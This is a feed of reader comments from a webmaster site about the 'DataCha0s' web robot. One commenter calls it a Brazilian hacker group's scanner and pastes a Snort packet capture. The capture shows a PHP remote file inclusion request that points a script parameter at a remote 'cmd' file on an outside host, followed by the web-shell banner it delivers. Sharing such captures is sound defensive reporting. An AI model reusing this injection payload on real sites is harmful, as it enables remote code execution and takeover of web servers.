Comments on: DataCha0s http://www.internetofficer.com/web-robot/datacha0s/ Tools and Articles for Webmasters and SEO's Thu, 22 Jul 2010 17:36:36 +0000 hourly 1 http://wordpress.org/?v=3.2.1 By: Reg Quinton http://www.internetofficer.com/web-robot/datacha0s/comment-page-1/#comment-1064 Reg Quinton Wed, 25 Jul 2007 15:39:38 +0000 http://www.internetofficer.com/web-robot/datacha0s/#comment-1064 DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here: <em>http:/</em><em>/ww</em><em>w.invasao.com.br/grupo04.htm</em> I'm seeing lots of different attacks. I assume some common code they're sharing. DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:

http://www.invasao.com.br/grupo04.htm

I’m seeing lots of different attacks. I assume some common code they’re sharing.

]]> By: Reg Quinton http://www.internetofficer.com/web-robot/datacha0s/comment-page-1/#comment-1060 Reg Quinton Thu, 19 Jul 2007 13:52:46 +0000 http://www.internetofficer.com/web-robot/datacha0s/#comment-1060 This robot seems to be doing PHP injection attacks as well. Snort packet capture: <code>07/19-02:12:29.380290 200.215.129.70:44232 -> 129.97.128.84:80 TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF ***AP*** Seq: 0xF2D04426 Ack: 0x225106 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1411345356 2713027245 47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com 70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai 6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht 74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp 6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm 64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close.. 55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data 43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host: 20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73 www.warriormens 62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate 72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca....</code> The content they're trying to eject is clearly malicious: <code>Angels of Death > #AoD > irc.gigachat.net > CMD > File List</code> This robot seems to be doing PHP injection attacks as well. Snort packet capture:

07/19-02:12:29.380290 200.215.129.70:44232 -> 129.97.128.84:80
TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF
***AP*** Seq: 0xF2D04426 Ack: 0x225106 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1411345356 2713027245
47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com
70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai
6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht
74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp
6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm
64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data
43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host:
20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73 http://www.warriormens
62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate
72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca....

The content they’re trying to eject is clearly malicious:

Angels of Death > #AoD > irc.gigachat.net > CMD > File List

]]>